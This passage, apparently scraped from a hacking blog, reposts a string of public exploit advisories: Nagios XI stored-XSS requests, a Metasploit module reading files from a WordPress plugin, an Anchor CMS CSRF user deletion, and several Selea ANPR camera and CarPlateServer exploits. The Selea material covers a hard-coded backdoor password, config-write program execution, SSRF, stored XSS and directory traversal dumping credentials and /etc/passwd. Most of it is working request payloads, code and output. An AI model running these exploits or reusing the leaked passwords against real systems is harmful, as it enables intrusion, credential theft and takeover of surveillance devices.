nsp=a2569a2507c7c69600769ca7388614b4264ab9479c560ac62bbc5f9fd76c2524&update=1&id=-1&name=XSS+Test&url=%27+onclick%3D%27alert%281%29&updateButton= ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in "Business Process Intelligence" functionality of Nagios XI. # Vulnerable Parameter : groupID # POC # Exploit Details : The following request will create a BPI group with an XSS payload. Click on the Group ID for the malicious BPI group to trigger the payload. POST /nagiosxi/includes/components/nagiosbpi/index.php?cmd=add HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 186 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/includes/components/nagiosbpi/index.php?cmd=add&tab=add Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td Upgrade-Insecure-Requests: 1 groupID=%27onclick%3Dalert%281%29%2F%2F&groupType=default&groupTitle=TEST&groupDesc=&groupInfoUrl=&groupPrimary=1&groupWarn=90&groupCrit=80&groupDisplay=2&addSubmitted=true ############################################################################################################ # Vulnerability Details # Description : A persistent cross-site scripting vulnerability exists in "Views" functionality of Nagios XI. # Vulnerable Parameter : url # POC # Exploit Details : The following request will create a view with an XSS payload. Click on the malicious view to trigger the payload. POST /nagiosxi/ajaxhelper.php HTTP/1.1 Host: TARGET User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 147 Origin: http://TARGET Connection: close Referer: http://TARGET/nagiosxi/account/ Cookie: nagiosxi=6lg3d4mqgsgsllclli1hch00td cmd=addview&url=javascript:alert(1)&title=TESTVIEW&submitButton=&nsp=c97136052a4b8d7d535c7d4a7a32389a5882c65cb34f2c36b849f72af52b2056
  12. HireHackking

    Wordpress Plugin Simple Job Board 2.9.3 - Authenticated File Read (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Scanner def initialize(info = {}) super(update_info(info, 'Name' => 'Simple JobBoard Authenticated File Read Vulnerability', 'Description' => %q{ This module exploits an authenticated directory traversal vulnerability in WordPress plugin 'Simple JobBoard ' < 2.9.3, allowing arbitrary file read with the web server privileges. }, 'Author' => [ 'Arcangelo Saracino', # Vulnerability discovery 'Hoa Nguyen - Suncsr Team', # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2020-35749'], ['WPVDB', 'eed3bd69-2faf-4bc9-915c-c36211ef9e2d'], ['URL','https://arkango.github.io/CVE-2020/CVE-2020-35749%20DIr.%20Traversal%20Simple%20Board%20Job%20Wordpress%20plugin.html'] ], 'DisclosureDate' => 'Jan 15 2021')) register_options([ OptString.new('FILEPATH',[true,'The path to the file to read','/etc/passwd']), OptString.new('USERNAME',[true,'The WordPress username to authenticate with']), OptString.new('PASSWORD',[true,'The Wordpress password to authenticate with']), OptInt.new('DEPTH',[true,'Traversal Depth (to reach the root folder',8]), ]) end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def check cookie = wordpress_login(username,password) if cookie.nil? store_valid_credential(user: username, private: password, proof: cookie) return CheckCode::Safe end CheckCode::Appears end def run_host(ip) cookie = wordpress_login(username, password) traversal = '../' * datastore['DEPTH'] filename = datastore['FILEPATH'] filename = filename[1, filename.length] if filename =~ /^\// res = send_request_cgi({ 'cookie' => cookie, 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'wp-admin',''), 'vars_get' => { 'post' => 'application_id', 'action' => 'edit', 'sjb_file' => "#{traversal}#{filename}" } }) fail_with Failure::Unreachable, 'Connection failed' unless res fail_with Failure::NotVulnerable, 'Connection failed. Nothingn was downloaded' if res.code != 200 fail_with Failure::NotVulnerable, 'Nothing was downloaded. Change the DEPTH parameter' if res.body.length.zero? print_good('Downloading file ...') print_line("\n#{res.body}\n") fname = datastore['FILEPATH'] path = store_loot( 'Simple_JobBoard.traversal', 'text/plain', ip, res.body, fname ) print_good("File save in: #{path}") end end
  13. HireHackking

    Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Local Privilege Escalation # Date: 08.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea CarPlateServer (CPS) v4.0.1.6 Local Privilege Escalation Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: 4.0.1.6(210120) 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. Desc: The application suffers from an unquoted search path issue impacting the service 'Selea CarPlateServer' for Windows deployed as part of Selea CPS software application. This could potentially allow an authorized but non-privileged local user to execute arbitrary code with elevated privileges on the system. A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application. Tested on: Microsoft Windows 10 Enterprise SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5621 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5621.php 08.11.2020 -- C:\Users\Smurf>sc qc "Selea CarPlateServer" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: Selea CarPlateServer TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:/Program Files/Selea/CarPlateServer/CarPlateService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : Selea CarPlateServer DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\Smurf>
  14. HireHackking

    Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea CarPlateServer (CPS) 4.0.1.6 - Remote Program Execution # Date: 08.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea CarPlateServer (CPS) v4.0.1.6 Remote Program Execution Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: 4.0.1.6(210120) 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: Our CPS (Car Plate Server) software is an advanced solution that can be installed on computers and servers and used as an operations centre. It can create sophisticated traffic control and road safety systems connecting to stationary, mobile or vehicle-installed ANPR systems. CPS allows to send alert notifications directly to tablets or smartphones, it can receive and transfer data through safe encrypted protocols (HTTPS and FTPS). CPS is an open solution that offers full integration with main video surveillance software. Our CPS software connects to the national operations centre and provides law enforcement authorities with necessary tools to issue alerts. CPS is designed to guarantee cooperation among different law enforcement agencies. It allows to create a multi-user environment that manages different hierarchy levels and the related division of competences. Desc: The server suffers from an arbitrary win32/64 binary executable execution when setting the NO_LIST_EXE_PATH variable to a program of choice. The command will be executed if proper trigger criteria is met. It can be exploited via CSRF or by navigating to /cps/ endpoint from the camera IP and bypass authentication gaining the ability to modify the running configuration including changing the password of admin and other users. Tested on: Microsoft Windows 10 Enterprise SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5622 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5622.php 08.11.2020 -- POST /config_request?ACTION=WRITE HTTP/1.1 Host: localhost:8080 Connection: keep-alive Content-Length: 6309 Authorization: Basic ZmFrZTpmYWtl Accept: application/json, text/plain, */* LoginMode: angular User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Edg/87.0.664.75 AuthToken: 6d0c4568-5c17-11eb-ab5f-54e1ad89571a content-type: application/json Origin: http://localhost:8080 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost:8080/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 { "ACTIONS": { "ANIA_LIST_DAYS_NUM": "15", "ANIA_LIST_PWD": "", "ANIA_LIST_USER": "{B64valuehereommited}", "BLACK_LIST_COUNTRY": "", "EXACT_MATCH": "false", "FUZZY_MATCH": "true", "MINISTEROTRASPORTI_LIST_DAYS_NUM": "15", "MINISTEROTRASPORTI_LIST_ENABLE_CHECK": "0,1", "MINISTEROTRASPORTI_LIST_GET_OWNERS": "false", "MINISTEROTRASPORTI_LIST_PWD": "", "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_CARPLATE": "false", "MINISTEROTRASPORTI_LIST_SIGNAL_MISSING_REVISION": "false", "MINISTEROTRASPORTI_LIST_USER": "", "MINISTEROTRASPORTI_LIST_USE_SELEA_SERVER": "false", "MINISTEROTRASPORTI_LIST_USE_VPN": "true", "MINISTEROTRASPORTI_LIST_VPN_PASSWORD": "", "MINISTEROTRASPORTI_LIST_VPN_USERNAME": "", "MINISTERO_LIST_DAYS_NUM": "24", "MINISTERO_LIST_PWD": "", "MINISTERO_LIST_USER": "", "NO_LIST_ENABLED": "true", "NO_LIST_ENABLE_EXE": "true", "NO_LIST_EXE_PATH": "C:/windows/system32/calc.exe", "NO_LIST_HTTP": "http://localhost:8080/$TRIGGER_EXE_VAR", "NO_LIST_HTTP_ENABLED": "false", "NO_LIST_SEND_TCP_ALARM": "", "PERMISSIVE_MATCH": "true", "WHITE_LIST_ALLOWED_COUNTRY_TYPE_INFO": "" }, "CAMERAINFO": { "BA__________": { "APPROACHING": "", "CustomCameraId": "", "CustomGateId": "", "DetectDesc": "ZSL", "DetectId": "", "Direction": "", "GPSLocation": "", "GateDesc": "3", "GateId": "", "LEAVING": "", "ZoneName": "", "setname": "false", "skip": "false" } }, "CONTEXT": { "BA__________": { "URL": [ "https://www.zeroscience.mk" ] } }, "DBMS": { "DB_NAME": "", "DB_PASSWORD": "", "DB_SERVER": "", "DB_TYPE": "sqlite", "DB_USERNAME": "", "ENCRYPT_DB": "false", "SQLITE_MAX_MB_RAM_CACHE": "-1" }, "EMAIL": { "DEST": "", "FROM_EMAIL": "", "FROM_NAME": "", "LOG_USER_SEARCH": "false", "MIN_EMAIL_TIME": "5", "PASSWORD": "", "PORT": "25", "SEND_EMAIL_ON_TAMPER": "false", "SERVER": "", "SSL": "false", "USERNAME": "", "XOAUTH2": "false" }, "EMAIL-XOAUTH2": { "refresh_token": "" }, "EZ_CLIENTS": { "PASSWORD": "", "SLAVES": "", "USERNAME": "", "USE_CNTLM": "false", "WANT_CTX": "false" }, "EZ_CLIENT_SCNTT": { "CTX": "true", "HOST": "", "PASSWORD": "", "PORT": "443", "USERNAME": "" }, "FTPSYNC": { "DELETE_OLD_SYNC_DAYS": "7", "JSON_CONFIG": "eyJzZXJ2ZXJzX2NvbmZpZyI6IFtdfQ==", "SAVE_FTP_SEND_ERRORS": "true" }, "GLOBAL_HTTP_PROXY": { "CNTLM_ENABLED": "false", "EZ_ADDRESS": "cps.selea.com", "EZ_PORT": "8999", "HOST": "", "NON_PROXY_HOST": "localhost|^(10|127|169\\.254|172\\.1[6-9]|172\\.2[0-9]|172\\.3[0-1]|192\\.168)\\..+", "PASSWORD": "", "PORT": "", "PROXY_ENABLED": "true", "USERNAME": "" }, "HTTPS": { "CERTIFICATE": "", "ENABLE_HTTP2": "true", "GET_CERTIFICATE_FROM_SELEA": "false", "PRIVATE_KEY": "", "ROOT_CERTIFICATE": "" }, "MASTER_CPS": { "ENABLED": "true", "MASTERS": "", "PASSWORD": "", "USERNAME": "" }, "PROXY_TCP": { "ENABLED": "false", "USE_HTTP_PROXY": "false" }, "REMOTE_LIST": { "ADDRESS": "", "ENABLED": "false", "PASSWORD": "", "PORT": "", "USERNAME": "" }, "REPORT": { "STATS_AGGREGATE": "true", "STATS_ENABLED": "false", "STATS_FREQ": "MONTH", "STATS_PATH": "", "STATS_SELECTED": "", "STATS_WEEK_DAY": "Mon" }, "SCNTT": { "LIST_A1_DAYS_LIMIT": "0", "SCNTT_PASSWORD": "", "SCNTT_PRIV_KEY_FILENAME": "", "SCNTT_PUB_CERT": "", "SCNTT_SYSTEM_DESC": "", "SCNTT_SYSTEM_ID": "", "SCNTT_USERNAME": "" }, "SETTINGS": { "ALLOW_FLASH_NOTIFICATIONS": "true", "AUTO_UPDATE": "true", "BACKUP_AT_SPECIFIC_HOUR": "-1", "BACKUP_DB_PATH": "", "BACKUP_EVERY_HOURS": "0", "CARPLATE_DETAILS_ENABLED": "false", "CHECK_EXPIRING_CARPLATES": "false", "CHECK_EXPIRING_CARPLATES_DAYS": "7", "CHECK_FILENAME_SYNTAX": "true", "DB_DELETE_DAYS": "90", "DB_DELETE_ENABLE": "false", "DB_DELETE_LOG_DAYS": "7", "DB_DELETE_OCR_FILE": "90", "DB_STATS_DELETE_DAYS": "90", "DISABLE_WHITELIST_REMOTE_DB_CHECK": "false", "ENCRYPT_IMAGES": "false", "FREE_DISK_LIMIT": "1000", "FRIENDLY_NAME": "test", "FTP_CUSTOM_PORT_RANGE": "false", "FTP_DOWNLOAD_DISABLED": "true", "FTP_ENABLED": "true", "FTP_EXTERN_IP": "", "FTP_EXTERN_IP_AUTO": "false", "FTP_LIST_DIR_DISABLED": "true", "FTP_MAX_PORT": "0", "FTP_MIN_PORT": "0", "FTP_PORT": "21", "FTP_USERS": "", "FTP_USE_FTPS": "true", "HTTP2_PORT": "8081", "HTTP_PASSWORD": "CR_B_B64/emEEokEfjdQqWo5pfQtoTCA80va3gcU", "HTTP_PORT": "8080", "HTTP_USERNAME": "admin", "IGNORE_CONTEXT_FOR_UNREADFAKE": "false", "IGNORE_IF_NOT_SYNTAX_MATCH": "false", "MILESTONE_CONNECTIONS": "5", "MILESTONE_ENABLED": "true", "MILESTONE_ENABLE_ACTIVE_CONNECTION": "false", "MILESTONE_PORT": "5666", "MILESTON_REMOTE_IP": "", "MILESTON_REMOTE_PORT": "8080", "MIN_LOG_LEVEL": "0", "PERIODIC_BACKUP_CONFIG": "0", "REMOVE_BLACK_LIST_ON_EXPIRE": "true", "REMOVE_NON_ALARM_CARPLATE": "false", "REMOVE_WHITE_LIST_ON_EXPIRE": "true", "SAVE_GATEWAY_SEND_ERRORS": "true", "SAVE_GATEWAY_SEND_ERRORS_MAX_DAYS": "7", "SEND_EMAIL_ON_LOST_CONNECTION": "false", "SEND_EMAIL_ON_LOST_CONNECTION_MIN_TIME": "600", "SEND_EMAIL_ON_NO_PLATE_READ": "false", "SEND_EMAIL_ON_NO_PLATE_READ_MIN_TIME": "12", "SERVER_NTP_ON": "false", "SERVER_NTP_PORT": "123", "USE_HTTPS": "false" }, "VPNC": { "VPN_NET_NAME": "" }, "TCP_TEMPLATES": [] }
  15. HireHackking

    Anchor CMS 0.12.7 - CSRF (Delete user)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Anchor CMS 0.12.7 - CSRF (Delete user) # Exploit Author: Ninad Mishra # Vendor Homepage: https://anchorcms.com/ # Software Link: https://anchorcms.com/download # Version: 0.12.7 # CVE : CVE-2020-23342 ###PoC the cms uses get method to perform sensitive actions hence users can be deleted via exploit.html ================================ <img src="http://target/anchor/index.php/admin/users/delete/21"> ================================ Where (21) is the user id . When admin clicks on exploit.html link User with id 21 will be deleted
  16. HireHackking

    Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - Developer Backdoor Config Overwrite # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Developer Backdoor Config Overwrite Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: There is a hard-coded password for a hidden and undocumented /dev.html page that enables the vendor to enable configuration upload / overwrite to the affected device using the checkManufacturer() function through an AJAX method. ====================================================================================== /dev.html: ---------- ... ... function checkManufacturer(){ var manufacturer=$.cookie('manufacturer'); if (manufacturer){ $('#set_manufacturer').val('Disable manufacturer'); $('#dev_page').show(); $('#config_restore').show(); } else{ $('#set_manufacturer').val('Enable manufacturer'); $('#dev_page').hide(); $('#config_restore').hide();} } checkManufacturer(); function setMsg(msg){$('#dev_msg').html(msg); setTimeout(function(){$('#dev_msg').html("");},5000)}; $('#set_manufacturer').click(function(){ var manufacturer=$.cookie('manufacturer'); if (manufacturer){ $.cookie('manufacturer',null); location.reload(); } else{ $.ajax({ url: "/cgi-bin/utils.php?cmd=DEVPASS&pwd="+md5($('#dev_pwd').val()), timeout: 2000, cache:false, mimeType: 'text/plain' }).done(function(result){ try{ var info=$.parseJSON(result); if (info.auth=="OK"){ setManufacturerTimeout(); location.reload(); ... ... /cgi-bin/utils.php: ------------------- ... ... $cmd=$_GET["cmd"]; if ($cmd=="DEVPASS"){ $pwd=$_GET["pwd"]; $info=new StdClass(); $info->auth=($pwd==md5("Selea781830"))?"OK":"ERROR"; print(json_encode($info, JSON_UNESCAPED_UNICODE | JSON_UNESCAPED_SLASHES | JSON_NUMERIC_CHECK | JSON_PRETTY_PRINT)); exit(); } ... ... ====================================================================================== Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5615 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5615.php 07.11.2020 -- $ curl http://192.168.1.17/cgi-bin/utils.php?cmd=DEVPASS&pwd=4654fa64de66a5ff0befde3c0203817b { "auth": "OK" } OR Navigate to /dev.html and enter password: Selea781830, enable config upload.
  17. HireHackking

    Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - 'files_list' Remote Stored XSS # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Remote Stored XSS Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The application suffers from a stored XSS through a POST request. The issue is triggered when input passed to the 'files_list' parameter is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5614 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5614.php 07.11.2020 -- Remote Stored XSS: ------------------ POST /cgi-bin/get_file.php HTTP/1.1 Host: 192.168.1.17 name=Test&files_list=<marquee><h3>t00t</h3></marquee> Unauthenticated Log Pollution Trigger XSS: ------------------------------------------ GET /get_log.php?type=system HTTP/1.1 Host: 192.168.1.17
  18. HireHackking

    Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - Multiple SSRF (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Unauthenticated SSRF Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: Unauthenticated Server-Side Request Forgery (SSRF) vulnerability exists in the Selea ANPR camera within several functionalities. The application parses user supplied data in the POST JSON parameters 'ipnotify_address' and 'url' to construct an image request or check DNS for IP notification. Since no validation is carried out on the parameters, an attacker can specify an external domain and force the application to make an HTTP request to an arbitrary destination host. This can be used by an external attacker for example to bypass firewalls and initiate a service and network enumeration on the internal network through the affected application. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5617 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5617.php 07.11.2020 -- Request: -------- POST /cps/test_backup_server?ACTION=TEST_IP&NOCONTINUE=TRUE HTTP/1.1 Host: 192.168.1.17 {"test_type":"ip","test_debug":false,"ipnotify_type":"http/get","ipnotify_address":"http://127.0.0.1:80","ipnotify_username":"","ipnotify_password":"","ipnotify_port":"0","ipnotify_content_type":"","ipnotify_template":""} Response (port 80): ------------------- {"bandwidth": 1.3571428571428572,"elapsed_ms": 14,"result": "OK","size": 19} Response (port 8080): --------------------- {"code": 500,"error": "Error sending notification: Connection refused"} Request: -------- POST /cps/test_url HTTP/1.1 Host: 192.168.1.17 {"url":"http://127.0.0.1:80"}: Response (port 80): ------------------- {"elapsed_ms": 2,"jpeg": "GGh0bWw+CjxoZWFkPgo8dGl0bGU+U2VsZWEgQU5QU4BjYW1lcmE8L3RpdGxlPgo8bWV0YSBodHRwLWVxdWl2PSJyZWZyZXNoIiBjb250ZW50PSIwO1VSTD0vbhl2ZS5odG1sIj4KPC9oZWFkPgo8Ym9keT48L2JvJHk+CjwvaHRtbD4KCg==","result": "OK"} Response (port 8081): --------------------- {"elapsed_ms": 1,"error": "Connection refused"}
  19. HireHackking

    Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - Directory Traversal File Disclosure (Unauthenticated) # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera Unauthenticated Directory Traversal File Disclosure Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The ANPR camera suffers from an unauthenticated arbitrary file disclosure vulnerability. Input passed through the Download Archive in Storage page using get_file.php script is not properly verified before being used to download files. This can be exploited to disclose the contents of arbitrary and sensitive files via directory traversal attacks and aid the attacker to disclose clear-text credentials resulting in authentication bypass. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5616 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5616.php 07.11.2020 -- $ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fmnt/data/auth/users.json { "viewers": {}, "root_pwd": "P@$$w0rd", "operators": {} } $ curl http://192.168.1.17:8080/CFCARD/images/SeleaCamera/%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd root:x:0:0:root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:99:99:nobody:/home:/bin/false dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false POST /cgi-bin/get_file.php HTTP/1.1 Host: 192.168.1.17 name=TESTINGUS&files_list=/etc/passwd HTTP/1.1 200 OK Content-Type: application/octet-stream Content-disposition: attachment; filename="TESTINGUS.tar" Expires: 0 Cache-Control: must-revalidate Pragma: public Content-Length: 2048 Connection: close Date: Wed, 09 Dec 2020 01:39:57 GMT Server: selea_httpd root:/root:/bin/sh daemon:x:1:1:daemon:/usr/sbin:/bin/false bin:x:2:2:bin:/bin:/bin/false sys:x:3:3:sys:/dev:/bin/false sync:x:4:100:sync:/bin:/bin/sync mail:x:8:8:mail:/var/spool/mail:/bin/false www-data:x:33:33:www-data:/var/www:/bin/false operator:x:37:37:Operator:/var:/bin/false nobody:x:99:99:nobody:/home:/bin/false dbus:x:1000:1000:DBus messagebus user:/var/run/dbus:/bin/false
  20. HireHackking

    Selea Targa IP OCR-ANPR Camera - CSRF Add Admin

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Selea Targa IP OCR-ANPR Camera - CSRF Add Admin # Date: 07.11.2020 # Exploit Author: LiquidWorm # Vendor Homepage: https://www.selea.com Selea Targa IP OCR-ANPR Camera CSRF Add Admin Exploit Vendor: Selea s.r.l. Product web page: https://www.selea.com Affected version: Model: iZero Targa 512 Targa 504 Targa Semplice Targa 704 TKM Targa 805 Targa 710 INOX Targa 750 Targa 704 ILB Firmware: BLD201113005214 BLD201106163745 BLD200304170901 BLD200304170514 BLD200303143345 BLD191118145435 BLD191021180140 BLD191021180140 CPS: 4.013(201105) 3.100(200225) 3.005(191206) 3.005(191112) Summary: IP camera with optical character recognition (OCR) software for automatic number plate recognition (ANPR) also equipped with ADR system that enables it to read the Hazard Identification Number (HIN, also known as the Kemler Code) and UN number of any vehicle captured in free-flow mode. TARGA is fully accurate in reading number plates of vehicles travelling at high speed. Its varifocal, wide-angle lens makes this camera suitable for all installation conditions. Its built-in OCR software works as an automatic and independent system without the need of a computer, thus giving autonomy to the device even in the event of an interruption in the connection between the camera and the operations centre. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: GNU/Linux 3.10.53 (armv7l) PHP/5.6.22 selea_httpd HttpServer/0.1 SeleaCPSHttpServer/1.1 Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2021-5618 Advisory URL: 